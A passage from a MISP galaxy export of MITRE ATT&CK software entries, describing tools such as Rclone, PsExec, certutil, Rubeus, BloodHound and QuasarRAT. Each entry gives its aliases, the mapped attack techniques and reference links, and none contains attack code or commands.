[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)

The tag is: misp-galaxy:mitre-tool="Rclone - S1040"

Rclone - S1040 is also known as:

  • Rclone

Table 7845. Table References

Links

https://attack.mitre.org/software/S1040

https://rclone.org

https://redcanary.com/blog/rclone-mega-extortion/

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://unit42.paloaltonetworks.com/darkside-ransomware/

netstat - S0104

[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)

The tag is: misp-galaxy:mitre-tool="netstat - S0104"

netstat - S0104 is also known as:

  • netstat

netstat - S0104 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 7846. Table References

Links

https://attack.mitre.org/software/S0104

https://technet.microsoft.com/en-us/library/bb490947.aspx

PcShare - S1050

[PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014)

The tag is: misp-galaxy:mitre-tool="PcShare - S1050"

PcShare - S1050 is also known as:

  • PcShare

Table 7847. Table References

Links

https://attack.mitre.org/software/S1050

https://github.com/LiveMirror/pcshare

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

dsquery - S0105

[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

The tag is: misp-galaxy:mitre-tool="dsquery - S0105"

dsquery - S0105 is also known as:

  • dsquery

  • dsquery.exe

dsquery - S0105 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

Table 7848. Table References

Links

https://attack.mitre.org/software/S0105

https://technet.microsoft.com/en-us/library/cc732952.aspx

cmd - S0106

[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., <code>dir</code> (Citation: TechNet Dir)), deleting files (e.g., <code>del</code> (Citation: TechNet Del)), and copying files (e.g., <code>copy</code> (Citation: TechNet Copy)).

The tag is: misp-galaxy:mitre-tool="cmd - S0106"

cmd - S0106 is also known as:

  • cmd

  • cmd.exe

cmd - S0106 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7849. Table References

Links

https://attack.mitre.org/software/S0106

https://technet.microsoft.com/en-us/library/bb490880.aspx

https://technet.microsoft.com/en-us/library/bb490886.aspx

https://technet.microsoft.com/en-us/library/cc755121.aspx

https://technet.microsoft.com/en-us/library/cc771049.aspx

certutil - S0160

[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)

The tag is: misp-galaxy:mitre-tool="certutil - S0160"

certutil - S0160 is also known as:

  • certutil

  • certutil.exe

certutil - S0160 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7850. Table References

Links

https://attack.mitre.org/software/S0160

https://technet.microsoft.com/library/cc732443.aspx

netsh - S0108

[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)

The tag is: misp-galaxy:mitre-tool="netsh - S0108"

netsh - S0108 is also known as:

  • netsh

  • netsh.exe

netsh - S0108 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 7851. Table References

Links

https://attack.mitre.org/software/S0108

https://technet.microsoft.com/library/bb490939.aspx

BITSAdmin - S0190

[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)

The tag is: misp-galaxy:mitre-tool="BITSAdmin - S0190"

BITSAdmin - S0190 is also known as:

  • BITSAdmin

BITSAdmin - S0190 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7852. Table References

Links

https://attack.mitre.org/software/S0190

https://msdn.microsoft.com/library/aa362813.aspx

Koadic - S0250

[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-tool="Koadic - S0250"

Koadic - S0250 is also known as:

  • Koadic

Table 7853. Table References

Links

https://attack.mitre.org/software/S0250

https://github.com/zerosum0x0/koadic

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

PsExec - S0029

[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)

The tag is: misp-galaxy:mitre-tool="PsExec - S0029"

PsExec - S0029 is also known as:

  • PsExec

PsExec - S0029 has relationships with:

  • similar: misp-galaxy:tool="PsExec" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7854. Table References

Links

https://attack.mitre.org/software/S0029

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/

Net - S0039

The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)

[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.

The tag is: misp-galaxy:mitre-tool="Net - S0039"

Net - S0039 is also known as:

  • Net

  • net.exe

Net - S0039 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 7855. Table References

Links

http://windowsitpro.com/windows/netexe-reference

https://attack.mitre.org/software/S0039

https://msdn.microsoft.com/en-us/library/aa939914

esentutl - S0404

[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)

The tag is: misp-galaxy:mitre-tool="esentutl - S0404"

esentutl - S0404 is also known as:

  • esentutl

  • esentutl.exe

Table 7856. Table References

Links

https://attack.mitre.org/software/S0404

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)

FlexiSpy - S0408

[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)

[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)

The tag is: misp-galaxy:mitre-tool="FlexiSpy - S0408"

FlexiSpy - S0408 is also known as:

  • FlexiSpy

Table 7857. Table References

Links

http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html

https://attack.mitre.org/software/S0408

https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf

https://www.flexispy.com/

Reg - S0075

[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)

Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)

The tag is: misp-galaxy:mitre-tool="Reg - S0075"

Reg - S0075 is also known as:

  • Reg

  • reg.exe

Reg - S0075 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"

Table 7858. Table References

Links

https://attack.mitre.org/software/S0075

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/cc732643.aspx

Tasklist - S0057

The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)

The tag is: misp-galaxy:mitre-tool="Tasklist - S0057"

Tasklist - S0057 is also known as:

  • Tasklist

Tasklist - S0057 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7859. Table References

Links

https://attack.mitre.org/software/S0057

https://technet.microsoft.com/en-us/library/bb491010.aspx

ngrok - S0508

[ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-tool="ngrok - S0508"

ngrok - S0508 is also known as:

  • ngrok

Table 7860. Table References

Links

https://attack.mitre.org/software/S0508

https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/

NBTscan - S0590

[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)

The tag is: misp-galaxy:mitre-tool="NBTscan - S0590"

NBTscan - S0590 is also known as:

  • NBTscan

Table 7861. Table References

Links

https://attack.mitre.org/software/S0590

https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html

https://sectools.org/tool/nbtscan/

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments

ftp - S0095

[ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP)

The tag is: misp-galaxy:mitre-tool="ftp - S0095"

ftp - S0095 is also known as:

  • ftp

  • ftp.exe

ftp - S0095 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 7862. Table References

Links

https://attack.mitre.org/software/S0095

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp

https://linux.die.net/man/1/ftp

Systeminfo - S0096

[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)

The tag is: misp-galaxy:mitre-tool="Systeminfo - S0096"

Systeminfo - S0096 is also known as:

  • Systeminfo

Systeminfo - S0096 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7863. Table References

Links

https://attack.mitre.org/software/S0096

https://technet.microsoft.com/en-us/library/bb491007.aspx

Ping - S0097

[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)

The tag is: misp-galaxy:mitre-tool="Ping - S0097"

Ping - S0097 is also known as:

  • Ping

Ping - S0097 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 7864. Table References

Links

https://attack.mitre.org/software/S0097

https://technet.microsoft.com/en-us/library/bb490968.aspx

Arp - S0099

[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system’s Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)

The tag is: misp-galaxy:mitre-tool="Arp - S0099"

Arp - S0099 is also known as:

  • Arp

  • arp.exe

Arp - S0099 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7865. Table References

Links

https://attack.mitre.org/software/S0099

https://technet.microsoft.com/en-us/library/bb490864.aspx

schtasks - S0111

[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)

The tag is: misp-galaxy:mitre-tool="schtasks - S0111"

schtasks - S0111 is also known as:

  • schtasks

  • schtasks.exe

schtasks - S0111 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7866. Table References

Links

https://attack.mitre.org/software/S0111

https://technet.microsoft.com/en-us/library/bb490996.aspx

Lslsass - S0121

[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Lslsass - S0121"

Lslsass - S0121 is also known as:

  • Lslsass

Lslsass - S0121 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7867. Table References

Links

https://attack.mitre.org/software/S0121

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

UACMe - S0116

[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)

The tag is: misp-galaxy:mitre-tool="UACMe - S0116"

UACMe - S0116 has relationships with:

  • similar: misp-galaxy:malpedia="UACMe" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 7868. Table References

Links

https://attack.mitre.org/software/S0116

https://github.com/hfiref0x/UACME

Rubeus - S1071

[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk’s Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)

The tag is: misp-galaxy:mitre-tool="Rubeus - S1071"

Rubeus - S1071 is also known as:

  • Rubeus

Table 7869. Table References

Links

https://attack.mitre.org/software/S1071

https://github.com/GhostPack/Rubeus

https://thedfirreport.com/2020/10/08/ryuks-return/

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Cachedump - S0119

[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Cachedump - S0119"

Cachedump - S0119 is also known as:

  • Cachedump

Cachedump - S0119 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7870. Table References

Links

https://attack.mitre.org/software/S0119

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Pacu - S1091

Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.(Citation: GitHub Pacu)

The tag is: misp-galaxy:mitre-tool="Pacu - S1091"

Pacu - S1091 is also known as:

  • Pacu

Table 7871. Table References

Links

https://attack.mitre.org/software/S1091

https://github.com/RhinoSecurityLabs/pacu

Winexe - S0191

[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)

The tag is: misp-galaxy:mitre-tool="Winexe - S0191"

Winexe - S0191 has relationships with:

  • similar: misp-galaxy:tool="Winexe" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 7872. Table References

Links

https://attack.mitre.org/software/S0191

https://github.com/skalkoto/winexe/

https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

xCmd - S0123

[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)

The tag is: misp-galaxy:mitre-tool="xCmd - S0123"

xCmd - S0123 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 7873. Table References

Links

https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/

https://attack.mitre.org/software/S0123

BloodHound - S0521

[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)

The tag is: misp-galaxy:mitre-tool="BloodHound - S0521"

BloodHound - S0521 is also known as:

  • BloodHound

Table 7874. Table References

Links

https://attack.mitre.org/software/S0521

https://github.com/BloodHoundAD/BloodHound

https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

Pupy - S0192

[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)

The tag is: misp-galaxy:mitre-tool="Pupy - S0192"

Pupy - S0192 is also known as:

  • Pupy

Pupy - S0192 has relationships with:

  • similar: misp-galaxy:rat="Pupy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 7875. Table References

Links

https://attack.mitre.org/software/S0192

https://github.com/n1nj4sec/pupy

MailSniper - S0413

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)

The tag is: misp-galaxy:mitre-tool="MailSniper - S0413"

MailSniper - S0413 is also known as:

  • MailSniper

Table 7876. Table References

Links

https://attack.mitre.org/software/S0413

https://github.com/dafthack/MailSniper

Expand - S0361

[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-tool="Expand - S0361"

Expand - S0361 is also known as:

  • Expand

Table 7877. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

https://attack.mitre.org/software/S0361

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand

Tor - S0183

[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)

The tag is: misp-galaxy:mitre-tool="Tor - S0183"

Tor - S0183 is also known as:

  • Tor

Tor - S0183 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"

Table 7878. Table References

Links

http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf

https://attack.mitre.org/software/S0183

Forfiles - S0193

[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)

The tag is: misp-galaxy:mitre-tool="Forfiles - S0193"

Forfiles - S0193 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7879. Table References

Links

https://attack.mitre.org/software/S0193

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

Out1 - S0594

[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="Out1 - S0594"

Out1 - S0594 is also known as:

  • Out1

Table 7880. Table References

Links

https://attack.mitre.org/software/S0594

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

Responder - S0174

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)

The tag is: misp-galaxy:mitre-tool="Responder - S0174"

Responder - S0174 is also known as:

  • Responder

Responder - S0174 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 7881. Table References

Links

https://attack.mitre.org/software/S0174

https://github.com/SpiderLabs/Responder

PowerSploit - S0194

[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)

The tag is: misp-galaxy:mitre-tool="PowerSploit - S0194"

PowerSploit - S0194 is also known as:

  • PowerSploit

PowerSploit - S0194 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7882. Table References

Links

http://powersploit.readthedocs.io

http://www.powershellmagazine.com/2014/07/08/powersploit/

https://attack.mitre.org/software/S0194

https://github.com/PowerShellMafia/PowerSploit

meek - S0175

[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

The tag is: misp-galaxy:mitre-tool="meek - S0175"

meek - S0175 is also known as:

  • meek

meek - S0175 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"

Table 7883. Table References

Links

https://attack.mitre.org/software/S0175

IronNetInjector - S0581

[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )

The tag is: misp-galaxy:mitre-tool="IronNetInjector - S0581"

IronNetInjector - S0581 is also known as:

  • IronNetInjector

Table 7884. Table References

Links

https://attack.mitre.org/software/S0581

https://unit42.paloaltonetworks.com/ironnetinjector/

ConnectWise - S0591

[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="ConnectWise - S0591"

ConnectWise - S0591 is also known as:

  • ConnectWise

  • ScreenConnect

Table 7885. Table References

Links

https://attack.mitre.org/software/S0591

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

SDelete - S0195

[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)

The tag is: misp-galaxy:mitre-tool="SDelete - S0195"

SDelete - S0195 is also known as:

  • SDelete

SDelete - S0195 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 7886. Table References

Links

https://attack.mitre.org/software/S0195

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

AsyncRAT - S1087

[AsyncRAT](https://attack.mitre.org/software/S1087) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.(Citation: Morphisec Snip3 May 2021)(Citation: Cisco Operation Layover September 2021)(Citation: Telefonica Snip3 December 2021)

The tag is: misp-galaxy:mitre-tool="AsyncRAT - S1087"

AsyncRAT - S1087 is also known as:

  • AsyncRAT

Table 7887. Table References

Links

https://attack.mitre.org/software/S1087

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/

https://telefonicatech.com/blog/snip3-investigacion-malware

MimiPenguin - S0179

[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)

The tag is: misp-galaxy:mitre-tool="MimiPenguin - S0179"

MimiPenguin - S0179 is also known as:

  • MimiPenguin

MimiPenguin - S0179 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7888. Table References

Links

https://attack.mitre.org/software/S0179

https://github.com/huntergregal/mimipenguin

Havij - S0224

[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)

The tag is: misp-galaxy:mitre-tool="Havij - S0224"

Havij - S0224 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 7889. Table References

Links

https://attack.mitre.org/software/S0224

https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/

sqlmap - S0225

[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)

The tag is: misp-galaxy:mitre-tool="sqlmap - S0225"

sqlmap - S0225 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 7890. Table References

Links

http://sqlmap.org/

https://attack.mitre.org/software/S0225

QuasarRAT - S0262

[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)

The tag is: misp-galaxy:mitre-tool="QuasarRAT - S0262"

QuasarRAT - S0262 is also known as:

  • QuasarRAT

  • xRAT

Table 7891. Table References

Links

https://attack.mitre.org/software/S0262

